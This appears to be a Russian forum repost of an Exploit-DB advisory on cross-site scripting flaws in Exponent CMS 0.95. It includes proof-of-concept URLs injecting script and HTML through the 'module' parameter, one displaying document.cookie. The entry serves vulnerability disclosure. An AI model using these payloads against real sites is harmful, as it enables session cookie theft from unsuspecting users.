- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25058
- Проверка EDB
-
- Пройдено
- Автор
- Y3DIPS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2005-12-25
Код:
source: https://www.securityfocus.com/bid/12358/info
Exponent is reported prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user facilitating theft of cookie-based authentication credentials and other attacks.
Exponent 0.95 is reported prone to these issues. It is likely that previous versions are vulnerable as well.
http://www.example.com/endon/mod.php?action=[BLABLA]&module=[XSS]
http://www.example.com/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1>- Источник
- www.exploit-db.com
